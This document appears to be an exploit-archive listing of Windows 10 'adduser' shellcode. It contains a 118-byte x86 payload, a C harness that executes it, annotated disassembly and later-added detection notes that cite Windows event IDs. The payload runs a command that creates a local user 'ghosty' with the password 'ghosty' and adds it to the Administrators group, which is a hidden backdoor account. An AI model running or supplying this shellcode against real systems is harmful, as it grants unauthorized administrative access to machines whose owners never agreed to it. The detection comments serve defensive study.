
Windows10 adduser shellcode - (118 Bytes)

Author: Ghosty , Published: 26-11-2014
/*
▄██████▄ ▄█ █▄ ▄██████▄ ▄████████ ███ ▄██ ▄
███ ███ ███ ███ ███ ███ ███ ███ ▀█████████▄ ███ ██▄
███ █▀ ███ ███ ███ ███ ███ █▀ ▀███▀▀██ ███▄▄▄███
▄███ ▄███▄▄▄▄███▄▄ ███ ███ ███ ███ ▀ ▀▀▀▀▀▀███
▀▀███ ████▄ ▀▀███▀▀▀▀███▀ ███ ███ ▀███████████ ███ ▄██ ███
███ ███ ███ ███ ███ ███ ███ ███ ███ ███
███ ███ ███ ███ ███ ███ ▄█ ███ ███ ███ ███
████████▀ ███ █▀ ▀██████▀ ▄████████▀ ▄████▀ ▀█████▀
###
# Title : Windows10 adduser shellcode - (118 Bytes)
# Author : Ghosty
# E-mail : x31337666@gmail.com
# Home : Hydra (16040) - Algeria -(00551216458)
# Web Site : 127.0.0.1
# FaCeb0ok : http://fb.me/0x9h027
# Friendly Sites : www.exploit4arab.net * www.1337day.com
# Platform/CatID : Shellcode - Local - Win32
# Type : Shellcode - proof of concept - Windows
# Tested on : Windows10 Technical Preview
###
*/ // Adds a local user and places it in the Administrators group (credentials are hard-coded in the payload)
// user:ghosty
// pass:ghosty
#include <stdio.h>
#include <string.h>
/*
 * msg: 118-byte x86 (32-bit) payload, 34 bytes of code followed by an
 * 84-byte ASCII command string.
 *
 * Flow, as read from the bytes below:
 *   - jmp / call / pop: the leading jmp lands on the call at offset 0x1d,
 *     whose pushed return address is the start of the string; pop loads
 *     that address into ebx.
 *   - A zero byte is stored at string offset 0x53 (83), overwriting the
 *     trailing 'N' placeholder, so the literal holds no embedded NUL and
 *     the command is only terminated at run time. The payload therefore
 *     writes into its own buffer.
 *   - Two indirect calls go through hard-coded absolute addresses
 *     (0x76c45470, then 0x76c2db80).
 *
 * Embedded command (decoded from the data bytes):
 *   cmd.exe /c net user ghosty ghosty /ADD && net localgroup Administrators /ADD ghosty
 *
 * NOTE(review): the two call targets are not named anywhere on this page.
 * The argument pattern (0, string pointer) then (0) looks like
 * WinExec(cmd, 0) followed by ExitProcess(0) in kernel32 -- confirm.
 * Absolute addresses like these are tied to the author's test system and
 * module load address.
 *
 * Detection: process-creation logging (Security event 4688 with command
 * line, or Sysmon event 1) showing cmd.exe running "net user ... /ADD"
 * and "net localgroup Administrators ... /ADD"; Security events 4720
 * (user account created) and 4732 (member added to a local group).
 */
char msg[] =
"\xeb\x1b" // jmp to the call at offset 0x1d
"\x5b" // pop %ebx          ; ebx = address of the command string
"\x31\xc0" // xor %eax,%eax
"\x50" // push %eax         ; second argument = 0
"\x31\xc0" // xor %eax,%eax   ; redundant, eax is already 0
"\x88\x43\x53" // mov %al,0x53(%ebx) ; NUL-terminate: overwrite the 'N' at string offset 83
"\x53" // push %ebx         ; first argument = command string
"\xbb\x70\x54\xc4\x76" // mov $0x76c45470,%ebx ; hard-coded target (presumably WinExec -- confirm)
"\xff\xd3" // call *%ebx
"\x31\xc0" // xor %eax,%eax
"\x50" // push %eax         ; argument = 0
"\xbb\x80\xdb\xc2\x76" // mov $0x76c2db80,%ebx ; hard-coded target (presumably ExitProcess -- confirm)
"\xff\xd3" // call *%ebx
"\xe8\xe0\xff\xff\xff" // call back to offset 0x02; pushes the address of the string that follows
// Everything below is ASCII data, not code. The original listing carried
// linear-disassembler output for these bytes, which was meaningless.
"\x63\x6d\x64" // "cmd"
"\x2e" // "."
"\x65" // "e"
"\x78\x65" // "xe"
"\x20\x2f" // " /"
"\x63\x20" // "c "
"\x6e" // "n"
"\x65" // "e"
"\x74\x20" // "t "
"\x75\x73" // "us"
"\x65" // "e"
"\x72\x20" // "r "
"\x67\x68\x6f\x73\x74\x79" // "ghosty" (account name)
"\x20\x67\x68" // " gh"
"\x6f" // "o"
"\x73\x74" // "st"
"\x79\x20" // "y "  (end of "ghosty", the password)
"\x2f" // "/"
"\x41" // "A"
"\x44" // "D"
"\x44" // "D"
"\x20\x26" // " &"
"\x26\x20\x6e\x65" // "& ne"
"\x74\x20" // "t "
"\x6c" // "l"
"\x6f" // "o"
"\x63\x61\x6c" // "cal"
"\x67\x72\x6f" // "gro"
"\x75\x70" // "up"
"\x20\x41\x64" // " Ad"
"\x6d" // "m"
"\x69\x6e\x69\x73\x74\x72\x61" // "inistra"
"\x74\x6f" // "to"
"\x72\x73" // "rs"
"\x20\x2f" // " /"
"\x41" // "A"
"\x44" // "D"
"\x44" // "D"
"\x20\x67\x68" // " gh"
"\x6f" // "o"
"\x73\x74" // "st"
"\x79\x4e"; // "y" + 'N' placeholder, replaced by NUL at run time
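/*
 * Test harness: prints the length of msg, then transfers control to it.
 *
 * msg is a file-scope initialized array, so it lives in a data section.
 * On systems that enforce DEP/NX the indirect call below is expected to
 * fault instead of running the bytes.
 */
int main(void)
{
    /*
     * Converting an object pointer to a function pointer is not defined
     * by ISO C; it only works as a compiler extension.
     */
    int (*dz)() = (int(*)())msg;

    /*
     * strlen() returns size_t. Passing it to %u is a format/argument
     * mismatch, so convert explicitly (the length is far below UINT_MAX).
     */
    printf("bytes: %u\n", (unsigned)strlen(msg));
    dz();
    return 0;
}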
/*================[ ShellCode By Ghosty * 1337dayAlgeria Community * ]=========================================
# Greetz To 1337dayAlgeria Community +> TrOoN, Caddy, KedAnz, Indoushkha, Chevr0sky, Kha&miX, KinG Of PiraTeS
# Greetz To Inj3ct0r Members 31337 +> KedAns * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * Angel Injection
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * All Security and Exploits Webs
#=============================================================================================================*/
